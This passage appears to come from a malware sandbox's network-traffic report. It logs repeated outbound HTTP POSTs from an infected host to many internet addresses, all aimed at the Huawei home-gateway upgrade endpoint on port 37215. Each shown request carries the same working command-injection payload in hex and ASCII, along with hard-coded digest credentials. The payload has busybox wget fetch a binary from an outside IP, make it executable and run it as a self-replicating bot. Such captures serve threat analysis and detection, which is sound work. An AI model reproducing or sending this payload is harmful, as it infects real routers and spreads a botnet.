                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1132192.168.2.133284413.47.121.8337215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:00.435347080 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1133192.168.2.13434645.199.254.18037215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:00.435420036 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1134192.168.2.1354480197.234.81.5237215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:00.435420990 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1135192.168.2.1346952108.154.145.5137215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:00.441180944 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1136192.168.2.133863841.56.64.2437215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:00.441262007 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1137192.168.2.1348938197.139.55.4637215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:00.441327095 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1138192.168.2.1349938161.164.86.24837215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:00.441337109 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1139192.168.2.1344304157.79.199.22437215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:00.441364050 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1140192.168.2.1334542182.10.255.24837215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:00.441364050 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1141192.168.2.135492041.142.119.21537215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:00.441440105 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
